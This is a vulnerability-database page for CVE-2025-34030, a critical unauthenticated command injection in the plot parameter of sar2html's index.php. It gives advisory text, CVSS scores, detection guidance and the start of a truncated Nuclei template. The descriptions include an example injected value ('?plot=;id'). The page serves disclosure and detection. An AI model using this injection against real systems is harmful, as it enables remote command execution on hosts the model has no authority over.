CVE-2025-34030
published 2025-06-20CVE-2025-34030: An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize…
PriorityP192critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
59.07%
99.0th percentile
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-04 UTC.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sar2html | sar2html | <= 3.2.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect OS command injection attempts via the 'plot' parameter in GET requests to index.php; look for shell metacharacters (e.g., semicolons) appended to the parameter value. ↗
- →Match HTTP responses containing both 'sar2html Ver' and 'Select Host' strings to confirm a vulnerable sar2html instance was successfully reached. ↗
- →Monitor for outbound HTTP/DNS callback requests (OAST/interactsh) originating from the web server process following requests to index.php with a semicolon-prefixed plot parameter, indicating successful RCE. ↗
- →Active exploitation in the wild was observed by the Shadowserver Foundation on 2025-02-04 UTC; treat any matching traffic from that date onward as high-confidence compromise. ↗
- ·The vulnerability is exploitable by unauthenticated, remote attackers — no credentials or prior access are required, maximising exposure on any internet-facing sar2html deployment. ↗
- ·Command output is only rendered in the UI after interacting with the host selection element, so passive log-only monitoring of HTTP responses may miss successful exploitation. ↗
- ·Affected versions are 3.2.2 and prior; detections should target all instances of sar2html at or below this version. ↗
CVSS provenance
nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f9p6-9wvr-9crm: An OS command injection vulnerability exists in sar2html version 3
ghsa_unreviewed·2025-06-20
CVE-2025-34030 [CRITICAL] CWE-20 GHSA-f9p6-9wvr-9crm: An OS command injection vulnerability exists in sar2html version 3
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system.
VulnCheck
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2025·CVSS 10.0
CVE-2025-34030 [CRITICAL] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-04 UTC.
Affected: cemtan Sar2HTML
Required Action: Apply remediatio
No detection rules found.
Nuclei
sar2html <=3.2.2 Plot Parameter - Remote Code Execution
nuclei·CVSS 10.0
CVE-2025-34030 [CRITICAL] sar2html <=3.2.2 Plot Parameter - Remote Code Execution
sar2html <=3.2.2 Plot Parameter - Remote Code Execution
sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.
Template:
id: CVE-2025-34030
info:
name: sar2html <=3.2.2 Plot Parameter - Remote Code Execution
author: gy741,TATANKA97
severity: critical
description: |
sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands.
impact: |
Successful exploitation allows unauthenticated remote command execu
No writeups or analysis indexed.
2025-06-20
Published
Exploited in the wild